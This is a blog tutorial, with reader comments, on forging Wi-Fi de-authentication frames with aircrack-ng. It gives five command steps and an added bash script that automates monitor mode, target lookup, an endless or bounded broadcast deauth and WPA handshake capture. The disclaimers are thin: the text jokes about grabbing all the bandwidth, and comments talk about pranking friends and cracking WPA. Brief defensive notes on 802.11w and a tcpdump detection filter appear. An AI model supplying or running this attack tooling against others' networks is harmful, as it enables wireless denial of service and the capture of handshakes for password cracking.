DeAuth Attack – A simple tutorial

First, a little bit of info on what de-authentication is:

It is an attack in which we send forged de-authentication frames, with the access point's address as the sender, to the computers/devices connected to a particular WiFi access point. This disconnects every connected client from that access point (it has no effect if no wireless clients are associated, and it does nothing against a fake authentication, because there is no real client to disconnect).

This attack is usually used for following purposes:

  • Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked.”
  • Capturing WPA/WPA2 handshakes by forcing clients to re-authenticate
  • Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
  • If those three points don't make any sense, in simple words: this attack disconnects computers from an access point, so you can have all the WiFi bandwidth for yourself :p

Some people have asked me how a de-authentication attack can work on clients that are connected to the access point over an encrypted link (WEP/WPA). The answer is that 802.11 (a/b/g/n) management frames, the special frames used to establish and maintain a connection, are sent unencrypted and unauthenticated, so anyone in radio range can forge them. These include:

  • Authentication
  • De-authentication
  • Association request
  • Association response
  • Re-association request
  • Re-association response
  • Probe request
  • Probe response
  • Beacon

Here we are only interested in de-authentication. One caveat: 802.11w (Protected Management Frames) adds integrity protection to de-authentication and disassociation frames, and WPA3 requires it, so a client and access point that have negotiated PMF will discard forged de-authentication frames and this attack will not work against them.

In this tutorial we will learn how to perform this attack in FIVE simple steps (for research purposes only).

So lets begin:

I am posting this method for Linux. The monitor-mode and injection steps below depend on Linux wireless drivers, so do not expect them to work unchanged on Windows.

FIRST: You will need aircrack-ng. The method of installing it is different for every Linux distribution. In Ubuntu you can install it by issuing the following command in a terminal window:

sudo apt-get install aircrack-ng

SECOND: After installing it we need to find out whether our network adapter is detected by the system.

Issue the following command in a terminal window to get a list of detected adapters:

sudo airmon-ng

This will show an output like this:

UltimatePeter@ASUS-PC:~$ sudo airmon-ng
Interface       Chipset                 Driver
wlan0              Intel 965CDX     iwl3965 – [phy0]

It may show other adapters like eth0, eth1 and so on, but we only need wlan0 (i.e. the wireless adapter).

THIRD: Now we need to put our wireless card into monitor mode; issue the following command in a terminal window:

sudo airmon-ng start wlan0

which will print a message like "monitor mode enabled on mon0", where mon0 is the new interface we will use for monitoring. Recent versions of aircrack-ng (1.2 and later) name it after the adapter instead, e.g. wlan0mon; use whatever name airmon-ng reports in the commands that follow.

FOURTH: Now we need to find out which networks are available from our location. Make sure you are as close to your desired access point as possible and issue this command in a terminal:

sudo airodump-ng mon0

Note down the BSSID (MAC address) of your access point and the channel (CH column) it is on.

FIFTH: The final step! Issue the following command in a terminal:

sudo aireplay-ng -0 0 -a 00:AB:6C:CD:40:70 mon0

Where,

-0 is for de-authentication.

0 (zero) means keep sending de-authentication bursts indefinitely; a number such as 5 sends that many bursts and then stops, which is enough to force a WPA handshake.

-a 00:AB:6C:CD:40:70 is the BSSID of your network. (Replace 00:AB:6C:CD:40:70 with your network's BSSID.)

mon0 is the monitor interface we created earlier. It must be the last argument; to target a single client rather than every station, add -c followed by that client's MAC address before the interface name.

We will get an output like this:

20:10:02  Sending DeAuth to broadcast -- BSSID: [00:AB:6C:CD:40:70]
20:10:02  Sending DeAuth to broadcast -- BSSID: [00:AB:6C:CD:40:70]
20:10:03  Sending DeAuth to broadcast -- BSSID: [00:AB:6C:CD:40:70]
20:10:03  Sending DeAuth to broadcast -- BSSID: [00:AB:6C:CD:40:70]

This only shows that our de-authentication frames are going out to the broadcast address. Whether the attack actually worked is visible on the client side (it drops off the network) or in airodump-ng, where a client re-associates; when you target one station with -c, aireplay-ng also reports how many ACKs it received from that client.
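The five steps wrapped into one script, as an added example that is not part of the original post. It assumes aircrack-ng 1.2 or later (so the monitor interface is named wlan0mon rather than mon0), the iw and sudo commands, and a network you own. Only run_attack transmits anything; deauth_cmd and ap_lookup are pure string work and can be tried safely. The script name deauth.sh, the ESSID MyHomeAP and the CSV contents in sample_csv are made up for the example.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Wraps the five steps in
# functions so the aireplay-ng command line and the airodump-ng lookup can
# be checked before anything is transmitted. Assumptions: aircrack-ng >= 1.2
# (airmon-ng names the monitor interface <iface>mon, e.g. wlan0mon; older
# versions used mon0), the iw and sudo commands, and a network you own.
set -u

# A MAC address as airodump-ng prints it: six hex pairs separated by colons.
valid_mac() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# Build the aireplay-ng command line. count 0 means "keep sending"; a small
# bounded count (5 is plenty to force a WPA handshake) is the better default.
# With no client MAC the deauth goes to broadcast and -c is omitted: -c takes
# a station MAC, and putting the interface there makes aireplay-ng reject it
# as an invalid MAC address. The interface is always the last argument.
deauth_cmd() {   # deauth_cmd <monitor-iface> <bssid> <count> [client-mac]
    local iface=$1 bssid=$2 count=$3 client=${4:-}
    valid_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; return 2; }
    if [ -n "$client" ]; then
        valid_mac "$client" || { echo "bad client MAC: $client" >&2; return 2; }
        printf 'aireplay-ng -0 %s -a %s -c %s %s\n' "$count" "$bssid" "$client" "$iface"
    else
        printf 'aireplay-ng -0 %s -a %s %s\n' "$count" "$bssid" "$iface"
    fi
}

# Find the BSSID and channel of an ESSID in the CSV that
# "airodump-ng -w <prefix> --output-format csv" writes (<prefix>-01.csv).
# The access-point section has the columns
#   BSSID, First time seen, Last time seen, channel, ..., ID-length, ESSID, Key
# so channel is field 4 and ESSID field 14; the station section after the
# "Station MAC" header is skipped. Prints "BSSID CHANNEL", fails if not seen.
ap_lookup() {   # ap_lookup <csv-file> <essid>
    awk -F', *' -v essid="$2" '
        /^Station MAC/ { exit }
        NF >= 14 && length($1) == 17 && $1 ~ /^[0-9A-F:]+$/ && $14 == essid {
            print $1, $4; found = 1; exit
        }
        END { exit !found }' "$1"
}

# Constructed sample of such a CSV (not a real capture) for a dry run.
sample_csv() {
cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:AB:6C:CD:40:70, 2014-03-01 20:05:11, 2014-03-01 20:10:02,  6,  54, WPA2, CCMP, PSK, -41,      120,        0,   0.  0.  0.  0,   8, MyHomeAP, 
02:11:22:33:44:55, 2014-03-01 20:05:12, 2014-03-01 20:10:01, 11,  54, WPA2, CCMP, PSK, -67,       40,        0,   0.  0.  0.  0,   9, Neighbour, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2014-03-01 20:06:00, 2014-03-01 20:10:02, -50,      300, 00:AB:6C:CD:40:70, 
EOF
}

# The five steps end to end: monitor mode, a 20-second scan, channel lock, a
# capture of the target AP left running while the deauth goes out (that is
# what records the WPA handshake when clients reconnect), then clean-up.
run_attack() {   # run_attack <iface> <essid> <count> [client-mac]
    local iface=$1 essid=$2 count=$3 client=${4:-} mon prefix ap bssid chan cmd dump
    command -v airmon-ng >/dev/null || { echo "install aircrack-ng first" >&2; return 1; }
    sudo airmon-ng check kill                  # stop NetworkManager/wpa_supplicant
    sudo airmon-ng start "$iface" >/dev/null
    mon="${iface}mon"
    prefix=$(mktemp -d)/scan
    sudo timeout 20 airodump-ng -w "$prefix" --output-format csv "$mon" >/dev/null 2>&1
    ap=$(ap_lookup "${prefix}-01.csv" "$essid") || { echo "ESSID '$essid' not seen" >&2; return 1; }
    bssid=${ap% *}; chan=${ap#* }
    cmd=$(deauth_cmd "$mon" "$bssid" "$count" "$client") || return
    sudo iw dev "$mon" set channel "$chan"     # injection only works on the AP's channel
    sudo airodump-ng -c "$chan" --bssid "$bssid" -w "${prefix}-hs" "$mon" >/dev/null 2>&1 &
    dump=$!
    sleep 2
    echo "+ $cmd"
    sudo $cmd                                  # unquoted on purpose: split into arguments
    sleep 10                                   # give clients time to reconnect
    sudo kill "$dump" 2>/dev/null
    sudo airmon-ng stop "$mon" >/dev/null
    echo "capture files under ${prefix}-hs*"
}

# Usage: ./deauth.sh wlan0 MyHomeAP 5 [AA:BB:CC:DD:EE:01]
if [ $# -ge 3 ]; then run_attack "$@"; fi
```

To see the frames themselves, as attacker or defender, run tcpdump on a second monitor interface with the filter 'type mgt subtype deauth' and the -e flag; each forged frame then shows up with its source, destination and BSSID addresses, which is exactly what a wireless IDS keys on.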

Now… of course, this tutorial is only for use on your own home network and pieces of equipment you own. Like, maybe somebody is on your wifi and you want to kick them off, right?

6 Responses to DeAuth Attack – A simple tutorial

  1. toSve says:

    This is great when you have a party or friends coming over and you want to prank them, or when you are at a friend's place and want to prank him.
    Thanks for the tutorial Peter.

  2. mikeydoo says:

    Is it possible to deauth multiple access points together. Let’s say I have 6 wireless cards and I’m trying to capture from 4 networks. Can I deauth all 4 together or will I have to run separate instances of it.

    • Phil Collins says:

      Just set the different wireless cards for different targets.
      So when you do airmon-ng, specify which card you’re turning on monitoring. for example, run airmon-ng wlan0 and airmon-ng wlan1 for different monitoring.

  3. T-Bone says:

    Hey Peter, finally I get to meet you. I can hack wep all day long, but I still can’t do a WPA. Please help me, thanks!

  4. Dan says:

    Is it possible to deauth using a single packet? If so how?
    You can extract a packet and use it in the help options just unsure how to use it
    Regards dan

  5. BootEXE says:

    The "-c" option is for a specific client; if you want to deauth all, you need to delete the "-c" option or you will get the error "invalid MAC address".
